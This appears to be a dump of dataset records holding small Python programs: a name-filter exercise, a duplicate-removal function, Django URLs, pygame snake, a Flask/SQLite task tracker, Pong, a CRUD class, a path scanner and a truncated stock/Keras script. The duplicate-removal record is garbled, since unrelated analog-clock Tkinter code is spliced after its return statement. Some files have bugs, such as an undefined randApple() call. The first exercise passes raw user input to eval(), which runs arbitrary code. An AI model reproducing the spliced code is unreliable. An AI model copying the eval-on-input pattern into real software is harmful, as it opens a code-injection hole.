+{"seq_id":"563660665","text":"#3.25\r\n\"\"\"Implement a program that requests a list of student names from the user and prints\r\nthose names that start with letters A through M.\r\nEnter list: ['Ellie', 'Steve', 'Sam', 'Owen', 'Gavin']\r\nEllie\r\nGavin\"\"\"\r\n#CODE:\r\n\r\n# eval() turns the typed list literal into an actual list of names\r\nnames = eval(input(\"Enter the words_list: \"))\r\n\r\nfor name in names:\r\n    if name[0] in 'ABCDEFGHIJKLMabcdefghijklm':\r\n        print(name)\r\n","sub_path":"3.25.py","file_name":"3.25.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"261189396","text":"class Solution:\n    def removeDuplicates(self, nums):\n        if 
len(nums)<2:\n            return len(nums)\n        # two-pointer sweep: j marks the last unique element, i scans ahead\n        i = 1 \n        j = 0 \n        while(i < len(nums)):\n            if nums[i] == nums[j]:\n                i += 1\n            else:\n                j += 1\n                nums[j] = nums[i]\n        return j + 1\n        root.bind(\"<Escape>\", lambda _: root.destroy())\n        self.delta = timedelta(hours=deltahours)\n        self.canvas = Canvas(root,\n                             width=WIDTH,\n                             height=HEIGHT,\n                             background=self.bgcolor)\n        viewport = (self.pad, self.pad, WIDTH - self.pad, HEIGHT - self.pad)\n        self.T = Transformer(self.world, viewport)\n        self.root.title('AnalogClock')\n        self.canvas.bind(\"<Configure>\", lambda event: self.configure())  # bind a callable, not the result of a call\n        self.canvas.pack(fill=BOTH, expand=YES)\n        self.poll()\n\n    def configure(self):\n        self.redraw()\n\n    def redraw(self):\n        sc = self.canvas\n        sc.delete(self._ALL)\n        width = sc.winfo_width()\n        height = sc.winfo_height()\n        sc.create_rectangle([[0, 0], [width, height]],\n                            fill=self.bgcolor, tag=self._ALL)\n        viewport = (self.pad, self.pad, width - self.pad, height - self.pad)\n        self.T = Transformer(self.world, viewport)\n        self.paintgrafics()\n\n    def paintgrafics(self):\n        start = -pi / 2\n        step = pi / 6\n        for i in range(12):\n            angle = start + i * step\n            x, y = cos(angle), sin(angle)\n            self.paintcircle(x, y)\n        self.painthms()\n        self.paintcircle(0, 0)\n\n    def painthms(self):\n        T = datetime.timetuple(datetime.utcnow() - self.delta)\n        x, x, x, h, m, s, x, x, x = T\n        self.root.title('%02i:%02i:%02i' % (h, m, s))\n        angle = -pi / 2 + (pi / 6) * h + (pi / 6) * (m / 60.0)\n        x, y = cos(angle) * .60, sin(angle) * .60\n        scl = self.canvas.create_line\n        scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n            tag=self._ALL, width=6)\n        angle = -pi / 2 + (pi / 30) * m + (pi / 30) * (s / 60.0)\n        x, y = cos(angle) * .80, sin(angle) * .80\n        scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n            tag=self._ALL, width=3)\n        angle = -pi / 2 + (pi / 30) * s\n        x, y = cos(angle) * .95, sin(angle) * .95\n        scl(self.T.twopoints(*[0, 0, x, y]), fill=self.timecolor,\n            tag=self._ALL, arrow='last')\n\n    def paintcircle(self, x, y):\n        ss = self.circlesize / 2.0\n        mybbox = [-ss + x, -ss + y, ss + x, ss + y]\n        sco = self.canvas.create_oval\n        sco(self.T.twopoints(*mybbox), fill=self.circlecolor,\n            tag=self._ALL)\n\n    def poll(self):\n        self.configure()\n        self.root.after(200, self.poll)\n\n\ndef main():\n    root = Tk()\n    # deltahours: how far are you from utc?\n    # someone should automatize that, but I sometimes want to display\n    # time as if I am in another timezone ...\n    AnalogClock(root, deltahours=-1)\n    if not _inidle:\n        root.mainloop()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"tkinter/AnalogClock.py","file_name":"AnalogClock.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570623448","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.views.generic.simple import direct_to_template\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom tagging.models import TaggedItem\nfrom wakawaka.models import WikiPage\n\nfrom pinax.apps.account.openid_consumer import PinaxConsumer\nfrom pinax.apps.projects.models import Project\nfrom pinax.apps.tasks.models import Task\nfrom pinax.apps.topics.models import Topic as ProjectTopic\n\n\n\nhandler500 = \"pinax.views.server_error\"\n\n\nurlpatterns = patterns(\"\",\n    url(r\"^$\", direct_to_template, {\n        \"template\": \"homepage.html\",\n    }, name=\"home\"),\n    url(r\"^admin/invite_user/$\", \"pinax.apps.signup_codes.views.admin_invite_user\", name=\"admin_invite_user\"),\n    url(r\"^admin/\", include(admin.site.urls)),\n    url(r\"^about/\", include(\"about.urls\")),\n    url(r\"^account/\", include(\"pinax.apps.account.urls\")),\n    
url(r\"^openid/\", include(PinaxConsumer().urls)),\n url(r\"^profiles/\", include(\"idios.urls\")),\n url(r\"^notices/\", include(\"notification.urls\")),\n url(r\"^avatar/\", include(\"avatar.urls\")),\n url(r\"^comments/\", include(\"threadedcomments.urls\")),\n url(r\"^announcements/\", include(\"announcements.urls\")),\n url(r\"^tagging_utils/\", include(\"pinax.apps.tagging_utils.urls\")),\n url(r\"^attachments/\", include(\"attachments.urls\")),\n url(r\"^projects/\", include(\"pinax.apps.projects.urls\")),\n)\n\n\ntagged_models = (\n dict(title=\"Projects\",\n query=lambda tag: TaggedItem.objects.get_by_model(Project, tag),\n ),\n dict(title=\"Project Topics\",\n query=lambda tag: TaggedItem.objects.get_by_model(ProjectTopic, tag),\n ),\n dict(title=\"Project Tasks\",\n query=lambda tag: TaggedItem.objects.get_by_model(Task, tag),\n ),\n dict(title=\"Wiki Articles\",\n query=lambda tag: TaggedItem.objects.get_by_model(WikiPage, tag),\n ),\n)\ntagging_ext_kwargs = {\n \"tagged_models\": tagged_models,\n}\n\nurlpatterns += patterns(\"\",\n url(r\"^tags/(?P.+)/(?P.+)$\", \"tagging_ext.views.tag_by_model\",\n kwargs=tagging_ext_kwargs, name=\"tagging_ext_tag_by_model\"),\n url(r\"^tags/(?P.+)/$\", \"tagging_ext.views.tag\",\n kwargs=tagging_ext_kwargs, name=\"tagging_ext_tag\"),\n url(r\"^tags/$\", \"tagging_ext.views.index\", name=\"tagging_ext_index\"),\n)\n\n\nif settings.SERVE_MEDIA:\n urlpatterns += patterns(\"\",\n url(r\"\", include(\"staticfiles.urls\")),\n )\n","sub_path":"py/django_tools/pinax/pinax/projects/code_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"389209298","text":"import pygame\nimport time\nimport random\n\n# global variables\nWIDTH = 800\nHEIGHT = 600\n\npygame.init()\n\nWHITE = (255, 255, 255) #RGB\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 155, 0)\nKHAKI = (240, 230, 140)\n\n# returns a \"surface\" for the game\ngameDisplay = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('The Fun Game')\n\nicon = pygame.image.load('icon.png')\npygame.display.set_icon(icon)\n\nSTEP = 20\nAPPLE_THICKNESS = 30\nBLOCK_SIZE = 20\nFPS = 30\n# the img is declared out of any logic to avoid many IOs\nhead = pygame.image.load('snakehead.png')\napple = pygame.image.load('apple.png')\n\nclock = pygame.time.Clock()\n\nsmallFont = pygame.font.SysFont(\"comicsansms\", 25)\nmedFont = pygame.font.SysFont(\"comicsansms\", 50)\nlargeFont = pygame.font.SysFont(\"comicsansms\", 75)\n\ndef randAppleGen():\n\trandAppleX = round(random.randrange(0, WIDTH-APPLE_THICKNESS))#/10.0)*10\n\trandAppleY = round(random.randrange(0, HEIGHT-APPLE_THICKNESS))#/10.0)*10\n\n\treturn randAppleX, randAppleY\n\t\n\ndef game_intro():\n\tintro = True\n\twhile intro:\n\t\tgameDisplay.fill(WHITE)\n\t\tmessage_to_screen(\"WelCome to FunGame\",\n\t\t\t\t\t\tGREEN,\n\t\t\t\t\t\t0,\n\t\t\t\t\t\t\"large\")\n\t\tmessage_to_screen(\"Eat apples and fun will come. Period.\",\n\t\t\t\t\t\tRED,\n\t\t\t\t\t\t60,\n\t\t\t\t\t\t\"medium\")\n\t\tmessage_to_screen(\"Press S to start the game. 
Q to quit.\",\n\t\t\t\t\t\tRED,\n\t\t\t\t\t\t90)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_s:\n\t\t\t\t\tgameLoop()\n\t\t\t\telif event.key == pygame.K_q:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tquit()\n\t\t\t\telif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tquit()\n\n\t\tpygame.display.update()\n\t\tclock.tick(15)\n\n\ndef snake(snakeList, BLOCK_SIZE):\n\tgameDisplay.blit(head, (snakeList[-1][0], snakeList[-1][1]))\n\tfor piece in snakeList[:-1]:\n\t\tpygame.draw.rect(gameDisplay, GREEN, [piece[0], piece[1], BLOCK_SIZE, BLOCK_SIZE])\n\ndef text_objects(text, color, size=\"small\"):\n\tif size == \"small\":\n\t\ttextSurface = smallFont.render(text, True, color)\n\telif size == \"medium\":\n\t\ttextSurface = medFont.render(text, True, color)\n\telif size == \"large\":\n\t\ttextSurface = largeFont.render(text, True, color)\n\treturn textSurface, textSurface.get_rect()\n\t\t\ndef message_to_screen(msg, color, y_displace=0, size=\"small\"): # displacement from the center \n\ttextSurface, textRect = text_objects(msg, color, size)\n\ttextRect.center = (WIDTH/2), (HEIGHT/2)+y_displace\n\tgameDisplay.blit(textSurface, textRect)\n\ndef gameLoop():\n\tgameExit = False\n\tgameOver = False\n\n\tPOINTS = 0\n\n\tsnakeList = [] # a Snake is made of a list of pieces\n\tsnakeLength = 1\n\t\n\trandAppleX, randAppleY = randAppleGen()\n\n\t#Snake starting pos.\n\tlead_x = WIDTH/2\n\tlead_y = HEIGHT/2\n\n\tlead_x_change = 0\n\tlead_y_change = 0\n\n\twhile not gameExit:\n\t\t\n\t\t\n\t\twhile gameOver == True:\n\t\t\tgameDisplay.fill(BLACK)\n\t\t\tmessage_to_screen(\"Game Over\", RED, -50, \"large\")\n\t\t\tmessage_to_screen(\"Press C to play again, Q to quit\", WHITE, 0, \"medium\")\n\t\t\tpygame.display.update()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_q:\n\t\t\t\t\t\tgameExit = True\n\t\t\t\t\t\tgameOver = False\n\t\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\t\tPOINTS = 0\n\t\t\t\t\t\tgameLoop()\n\t\t\t\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tgameExit = True\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_LEFT:\n\t\t\t\t\tlead_x_change = -STEP\n\t\t\t\t\tlead_y_change = 0\n\t\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\t\tlead_x_change = STEP\n\t\t\t\t\tlead_y_change = 0\n\t\t\t\telif event.key == pygame.K_UP:\n\t\t\t\t\tlead_y_change = -STEP\n\t\t\t\t\tlead_x_change = 0\n\t\t\t\telif event.key == pygame.K_DOWN:\n\t\t\t\t\tlead_y_change = STEP\n\t\t\t\t\tlead_x_change = 0\n\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tif event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n\t\t\t\t\tlead_x_change = 0\n\t\t\t\telif event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n\t\t\t\t\tlead_y_change = 0\n\n\t\t#BOUNDERIES\n\t\tif lead_x >= WIDTH or lead_x <= 0 or lead_y >= HEIGHT or lead_y <= 0:\n\t\t\tgameOver = True\n\t\t\n\t\tlead_x += lead_x_change\n\t\tlead_y += lead_y_change\n\t\t\n\t\tgameDisplay.fill(WHITE)\n\n\t\tgameDisplay.blit(apple, randApple())\n\t\t#pygame.draw.rect(gameDisplay, RED, [randAppleX, randAppleY, STEP, STEP])\n\t\t\n\t\t# the magic, growing the snake\n\t\tsnakeHead = []\n\t\tsnakeHead.append(lead_x)\n\t\tsnakeHead.append(lead_y)\n\t\tsnakeList.append(snakeHead)\n\n\t\tif len(snakeList) > snakeLength:\n\t\t\tdel snakeList[0]\n\n\t\tfor eachPiece in snakeList[:-1]:\n\t\t\tif eachPiece == snakeHead:\n\t\t\t\tgameOver = 
True\n\t\t\n\t\tsnake(snakeList, BLOCK_SIZE)\n\n\t\tif (lead_x > randAppleX and lead_x < randAppleX + APPLE_THICKNESS) or ((lead_x + BLOCK_SIZE) > randAppleX and (lead_x + BLOCK_SIZE) < (randAppleX + APPLE_THICKNESS)):\n\t\t\tif (lead_y > randAppleY and lead_y < randAppleY + APPLE_THICKNESS) or ((lead_y + BLOCK_SIZE) > randAppleY and (lead_y + BLOCK_SIZE) < (randAppleY + APPLE_THICKNESS)):\t\n\t\t\t\trandAppleX, randAppleY = randAppleGen()\n\t\t\t\tsnakeLength += 1\n\t\t\t\tPOINTS += (1+(snakeLength/3))\n\n\t\tmessage_to_screen(str(POINTS), KHAKI, -200, \"large\")\n\t\t# alternative:\n\t\t# text = smallfont.render(str(POINTS), True black)\n\t\t# gameDisplay.blit(text, [0, 0])\n\t\t\n\t\tpygame.display.update()\n\t\tclock.tick(FPS)\n\t\n\tgameDisplay.fill(BLACK)\n\tmessage_to_screen('FUNGAME 2015 :)', WHITE, 0)\n\tpygame.display.update()\n\ttime.sleep(1)\n\tpygame.quit()\n\tquit()\n\ngame_intro()\t","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133739022","text":"from flask import Flask, render_template, request\r\nimport sqlite3 as sql\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n    return render_template('addAsset.html')\r\n\r\n@app.route('/add-asset')\r\ndef new_asset():\r\n    return render_template('addAsset.html')\r\n\r\n@app.route('/addasset',methods = ['POST', 'GET'])\r\ndef addasset():\r\n    msg=None\r\n    if request.method == 'POST':\r\n        try:\r\n            assetId = request.form['assetId']\r\n            assetName = request.form['assetName']\r\n            \r\n            with sql.connect(\"database.db\") as con:\r\n                cur = con.cursor()\r\n                \r\n                cur.execute(\"INSERT INTO asset (assetId,assetName) VALUES (?,?)\",(assetId,assetName) )\r\n                \r\n                con.commit()\r\n                msg = \"Record successfully added\"\r\n        except:\r\n            con.rollback()\r\n            msg = \"error in insert operation\"\r\n        \r\n        finally:\r\n            con.close()  # close before returning; statements after return in a finally block never run\r\n            return render_template(\"results.html\",msg = msg)\r\n\r\n@app.route('/assets/all')\r\ndef list():\r\n    con = sql.connect(\"database.db\")\r\n    con.row_factory = sql.Row\r\n    \r\n    cur = con.cursor()\r\n    cur.execute(\"select * from asset\")\r\n    \r\n    rows = cur.fetchall();\r\n    return render_template(\"assetList.html\",rows = rows)\r\n\r\n@app.route('/add-task')\r\ndef new_task():\r\n    return render_template('addTask.html')\r\n\r\n@app.route('/addtask',methods = ['POST', 'GET'])\r\ndef addtask():\r\n    msg=None\r\n    if request.method == 'POST':\r\n        try:\r\n            taskId = request.form['taskId']\r\n            taskName = request.form['taskName']\r\n            frequency = request.form['frequency']\r\n            with sql.connect(\"database.db\") as con:\r\n                cur = con.cursor()\r\n                \r\n                cur.execute(\"INSERT INTO task (taskId,taskName,frequency) VALUES (?,?,?)\",(taskId,taskName,frequency) )\r\n                \r\n                con.commit()\r\n                msg = \"Record successfully added\"\r\n        except:\r\n            con.rollback()\r\n            msg = \"error in insert operation\"\r\n        \r\n        finally:\r\n            con.close()\r\n            return render_template(\"results.html\",msg = msg)\r\n\r\n@app.route('/add-worker')\r\ndef new_worker():\r\n    return render_template('addWorker.html')\r\n\r\n@app.route('/addworker',methods = ['POST', 'GET'])\r\ndef addworker():\r\n    msg=None\r\n    if request.method == 'POST':\r\n        try:\r\n            workerId = request.form['workerId']\r\n            workerName = request.form['workerName']\r\n            \r\n            with sql.connect(\"database.db\") as con:\r\n                cur = con.cursor()\r\n                \r\n                cur.execute(\"INSERT INTO worker (workerId,workerName) VALUES (?,?)\",(workerId,workerName) )\r\n                \r\n                con.commit()\r\n                msg = 
\"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/allocate-task')\r\ndef alloc_task():\r\n return render_template('payload.html')\r\n\r\n@app.route('/alloc',methods = ['POST', 'GET'])\r\ndef alloc():\r\n msg=None\r\n if request.method == 'POST':\r\n try:\r\n assetId = request.form['assetId']\r\n taskId = request.form['taskId']\r\n workerId = request.form['workerId']\r\n timeOfAllocation = request.form['timeOfAllocation']\r\n taskToBePerformedBy = request.form['taskToBePerformedBy']\r\n \r\n with sql.connect(\"database.db\") as con:\r\n cur = con.cursor()\r\n \r\n cur.execute(\"INSERT INTO payload (assetId,taskId,workerId,timeOfAllocation,taskToBePerformedBy) VALUES (?,?,?,?,?)\",(assetId,taskId,workerId,timeOfAllocation,taskToBePerformedBy))\r\n \r\n con.commit()\r\n msg = \"Record successfully added\"\r\n except:\r\n con.rollback()\r\n msg = \"error in insert operation\"\r\n \r\n finally:\r\n return render_template(\"results.html\",msg = msg)\r\n con.close()\r\n\r\n@app.route('/get-tasks-for-workers/')\r\ndef getTasksList(workerId):\r\n con = sql.connect(\"database.db\")\r\n con.row_factory = sql.Row\r\n print(workerId)\r\n cur = con.cursor()\r\n cur.execute(\"select task.taskId,taskName,frequency from (payload INNER JOIN task ON payload.taskId=task.taskId) where payload.workerId=?\",(workerId,))\r\n rows = cur.fetchall();\r\n return render_template(\"taskList.html\",rows=rows)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137529687","text":"# Implementation of classic arcade game Pong\r\n\r\nimport simplegui\r\nimport random\r\n\r\n# initialize globals - pos and vel encode vertical info for paddles\r\nWIDTH = 600\r\nHEIGHT = 400 \r\nBALL_RADIUS = 20\r\nPAD_WIDTH = 8\r\nPAD_HEIGHT = 80\r\nHALF_PAD_WIDTH = PAD_WIDTH / 2\r\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\r\nLEFT = False\r\nRIGHT = True\r\n\r\npaddle1_pos = HEIGHT / 2.0\r\npaddle2_pos = HEIGHT / 2.0\r\npaddle1_vel = 0.0\r\npaddle2_vel = 0.0\r\nball_pos = [WIDTH / 2, HEIGHT / 2]\r\nball_vel = [0,0]\r\ntime = 0\r\nplayer_left = 0\r\nplayer_right = 0\r\n\r\n# helper function to restrict paddeles from moving off-canvas\r\ndef paddle_offcanvas(paddle_pos, paddle_vel):\r\n \r\n paddle_off = paddle_pos + paddle_vel\r\n \r\n if paddle_off >= HALF_PAD_HEIGHT:\r\n if paddle_off <= HEIGHT - HALF_PAD_HEIGHT:\r\n paddle_pos += paddle_vel\r\n \r\n return paddle_pos\r\n\r\n# timer\r\ndef timer_handler():\r\n global time\r\n time += 1\r\n return time\r\n\r\ndef timer_restart():\r\n global time\r\n timer.stop()\r\n time = 0\r\n return time\r\n\r\n# initialize ball_pos and ball_vel for new bal in middle of table\r\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\r\ndef spawn_ball(direction):\r\n global ball_pos, ball_vel # these are vectors stored as lists\r\n \r\n horizontal_vel = random.randrange(120,240)/100.0\r\n vertical_vel = random.randrange(60,180)/100.0\r\n \r\n if direction:\r\n ball_vel = [horizontal_vel, vertical_vel] \r\n else:\r\n ball_vel = [-horizontal_vel, vertical_vel]\r\n \r\n \r\n ball_pos = [WIDTH / 2, HEIGHT / 2]\r\n \r\n\r\n# define event handlers\r\ndef new_game():\r\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\r\n 
global player_right, player_left # these are ints\r\n    \r\n    random_start = random.randint(0, 1)\r\n    if random_start == 0:\r\n        spawn_ball(LEFT)\r\n    elif random_start == 1:\r\n        spawn_ball(RIGHT)\r\n    \r\n    player_right, player_left = 0, 0\r\n\r\ndef draw(canvas):\r\n    global paddle1_pos, paddle2_pos, ball_pos, ball_vel, player_right, player_left\r\n    \r\n    # draw mid line and gutters\r\n    canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\r\n    canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\r\n    canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\r\n    \r\n    # update ball\r\n    ball_pos[0] += ball_vel[0]\r\n    ball_pos[1] += ball_vel[1]\r\n    \r\n    if ball_pos[1] > HEIGHT - BALL_RADIUS:\r\n        ball_vel[1] = - ball_vel[1] \r\n    elif ball_pos[1] < BALL_RADIUS:\r\n        ball_vel[1] = - ball_vel[1]\r\n\r\n    # draw ball\r\n    canvas.draw_circle(ball_pos, BALL_RADIUS, 2, \"Red\", \"White\")\r\n    \r\n    # update paddle's vertical position, keep paddle on the screen\r\n    paddle1_pos = paddle_offcanvas(paddle1_pos, paddle1_vel)\r\n    paddle2_pos = paddle_offcanvas(paddle2_pos, paddle2_vel)\r\n    \r\n    # draw paddles\r\n    canvas.draw_line([0, paddle1_pos - HALF_PAD_HEIGHT],[0, paddle1_pos + HALF_PAD_HEIGHT], PAD_WIDTH*2,\"White\")\r\n    canvas.draw_line([WIDTH - HALF_PAD_WIDTH, paddle2_pos - HALF_PAD_HEIGHT],[WIDTH - HALF_PAD_WIDTH, paddle2_pos + HALF_PAD_HEIGHT], PAD_WIDTH,\"White\")\r\n    \r\n    # determine whether paddle and ball collide\r\n    if ball_pos[0] < PAD_WIDTH + BALL_RADIUS:\r\n        if ball_pos[1] <= paddle1_pos + HALF_PAD_HEIGHT and ball_pos[1] >= paddle1_pos - HALF_PAD_HEIGHT:\r\n            ball_vel[0] = - ( ball_vel[0] + ball_vel[0] * 0.1)\r\n            ball_vel[1] = ball_vel[1] + ball_vel[1] * 0.1\r\n        else:\r\n            timer.start()\r\n            if time == 3:\r\n                spawn_ball(RIGHT)\r\n                player_right += 1\r\n                timer_restart()\r\n    \r\n    if ball_pos[0] > WIDTH - BALL_RADIUS - PAD_WIDTH:\r\n        if ball_pos[1] <= paddle2_pos + HALF_PAD_HEIGHT and ball_pos[1] >= paddle2_pos - HALF_PAD_HEIGHT:\r\n            ball_vel[0] = - (ball_vel[0] + ball_vel[0] * 0.1)\r\n            ball_vel[1] = ball_vel[1] + ball_vel[1] * 0.1\r\n        else:\r\n            timer.start()\r\n            if time == 3:\r\n                spawn_ball(LEFT)\r\n                player_left += 1\r\n                timer_restart()\r\n    \r\n    # draw scores\r\n    canvas.draw_text(str(player_left), (WIDTH / 4, HEIGHT / 4), 44, \"White\")\r\n    canvas.draw_text(str(player_right), (WIDTH / 1.3, HEIGHT / 4), 44, \"White\")\r\n    \r\ndef keydown(key):\r\n    global paddle1_vel, paddle2_vel\r\n    \r\n    if key == simplegui.KEY_MAP['down']:\r\n        paddle2_vel += 5\r\n    elif key == simplegui.KEY_MAP['up']:\r\n        paddle2_vel -= 5\r\n    \r\n    if key == simplegui.KEY_MAP['s']:\r\n        paddle1_vel += 5\r\n    elif key == simplegui.KEY_MAP['w']:\r\n        paddle1_vel -= 5\r\n    \r\ndef keyup(key):\r\n    global paddle1_vel, paddle2_vel\r\n    \r\n    # only stop the paddle whose key was released, not both\r\n    if key in (simplegui.KEY_MAP['down'], simplegui.KEY_MAP['up']):\r\n        paddle2_vel = 0\r\n    elif key in (simplegui.KEY_MAP['s'], simplegui.KEY_MAP['w']):\r\n        paddle1_vel = 0\r\n\r\n# create frame\r\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\r\nframe.set_draw_handler(draw)\r\nframe.set_keydown_handler(keydown)\r\nframe.set_keyup_handler(keyup)\r\n\r\n# timer\r\ntimer = simplegui.create_timer(100, timer_handler)\r\n\r\n# buttons\r\nbutton1 = frame.add_button('Restart', new_game)\r\n\r\n# start frame\r\nnew_game()\r\nframe.start()\r\n\r\n","sub_path":"Pong: Game .py","file_name":"Pong: Game .py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"48394898","text":"from typing import Any\nfrom app import schemas, models\nfrom app.crud.base import CRUDBase\nfrom sqlalchemy.orm import 
Session\n\n\nclass CRUDPlotQueue(\n    CRUDBase[\n        models.PlotQueue,\n        schemas.PlotQueueCreate,\n        schemas.PlotQueueUpdate,\n        schemas.PlotQueueReturn,\n    ]\n):\n    def get_multi_by_server(\n        self,\n        db: Session,\n        *,\n        server: models.Server,\n        filtration: schemas.FilterData[Any] = schemas.FilterData[Any]()\n    ) -> tuple[int, list[models.PlotQueue]]:\n        query = db.query(self.model).filter(self.model.server == server)\n        return self._filter_multi_query(query, filtration)\n\n    def get_multi_linked_to_directory(\n        self,\n        db: Session,\n        *,\n        directory: models.Directory,\n        filtration: schemas.FilterData[Any] = schemas.FilterData[Any]()\n    ) -> tuple[int, list[models.PlotQueue]]:\n        query = db.query(self.model).filter(\n            (self.model.temp_dir == directory) | (self.model.final_dir == directory)\n        )\n        return self._filter_multi_query(query, filtration)\n","sub_path":"app/crud/plot_queue.py","file_name":"plot_queue.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"167535952","text":"import os\nimport sys\nimport datetime\nimport time\nimport subprocess\n\n# empty array\nnull_array=[]\n\n# ServerLog time folder for the previous hour (year_month_day)\n#ServerLog_time_last=(datetime.datetime.now()- datetime.timedelta(hours=1)).strftime(\"%Y_%m_%d_%H\")\n\ndef CheckServer(sp_logsourcepath):\n    # first-level folders\n    array=[]\n    for dirPaths in os.walk(sp_logsourcepath):\n        array.append(dirPaths[1])\n        #print(array)\n        break\n    \n    array2=[]\n    loop=0\n    # if an AS folder exists, record its write path\n    while loop < len(array[0]):\n        if array[0][loop] == \"AS\":\n            array2.append(sp_logsourcepath+array[0][loop])\n        loop+=1\n    \n    # full folder paths\n    loop=0 \n    while loop < len(array[0]):\n        for dirPaths in os.walk(sp_logsourcepath+array[0][loop]+\"\\\\\"):\n            if dirPaths[1]!=null_array:\n                loop1=0\n                while loop1 < len(dirPaths[1]):\n                    array2.append(dirPaths[0]+dirPaths[1][loop1])\n                    loop1+=1\n            break\n        loop+=1\n\n    # clear the output file\n    files = open(\"C:\\\\OpenApplication\\\\OpenApplication_checkpath.txt\",'w')\n    files.close()\n\n\n    # save the paths\n    loop2=0\n    while loop2 < len(array2):\n        files1 = open(\"C:\\\\OpenApplication\\\\OpenApplication_checkpath.txt\",'a')\n        #if(os.path.isfile(array2[loop2]+\"\\\\SysNrmMsg\"+ServerLog_time_last+\".txt\")):\n        files1.write(array2[loop2]+\"\\n\")\n        files1.close()\n        loop2+=1\n","sub_path":"MaintenanceTools/OpenApplication/OpenApplication_checkpath.py","file_name":"OpenApplication_checkpath.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"495094229","text":"'''Trains a simple deep NN linear regression (Multilayer perceptron) on the MNIST dataset. 
28X28 images of digits\n\nGets to 98.40% test accuracy after 20 epochs\n(there is *a lot* of margin for parameter tuning).\n2 seconds per epoch on a K520 GPU.\n'''\nimport matplotlib.pyplot as plt\n\nimport os  # used by symbol_to_path below\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom pandas_datareader import data as web  # used by get_data_from_web below\n\nfrom keras.layers import Dense\nfrom keras.models import Model, Sequential\nfrom keras import initializers\n\ndef kpi_returns(prices):\n    return ((prices-prices.shift(-1))/prices)[:-1]\n\n\n\ndef kpi_sharpeRatio():\n\n    risk_free_rate = 2.25 # 10 year US-treasury rate (annual) or 0\n    sharpe = 2\n    # ((mean_daily_returns[stocks[0]] * 100 * 252) - risk_free_rate ) / (std[stocks[0]] * 100 * np.sqrt(252))\n    return sharpe\n\ndef kpi_commulativeReturn():\n    return 2\n\n\ndef kpi_risk(df):\n    return df.std()\n\n\n\ndef softmax(z):\n    assert len(z.shape) == 2\n    s = np.max(z, axis=1)\n    s = s[:, np.newaxis]\n    e_x = np.exp(z - s)\n    div = np.sum(e_x, axis=1)\n    div = div[:, np.newaxis]\n    return e_x / div\n\ndef loss_log():\n    return 2\n\ndef loss_mse():\n    return 2\n\n\ndef loss_gdc():\n    return 2\n\ndef activation_sigmoid():\n    return 2\n\n\ndef plot_selected(df, columns, start_index, end_index):\n    \"\"\"Plot the desired columns over index values in the given range.\"\"\"\n    #df = df[columns][start_index:end_index]\n    df = df.loc[start_index:end_index, columns]  # .ix is deprecated; assign the slice so it takes effect\n    df = normalize(df)\n    plot_data(df)\n\ndef plot_data(df, title=\"normalized Stock prices\"):\n    \"\"\"Plot stock prices with a custom title and meaningful axis labels.\"\"\"\n    ax = df.plot(title=title, fontsize=12)\n    ax.set_xlabel(\"Date\")\n    ax.set_ylabel(\"Price\")\n    plt.show()\n\ndef plot_image(df, title):\n    plt.figure()\n    plt.imshow(df[0])#, cmap=plt.cm.binary)\n    plt.colorbar()\n    plt.gca().grid(False)\n    plt.title(title)\n    plt.show()\n\ndef plot_images(x,y, title):\n  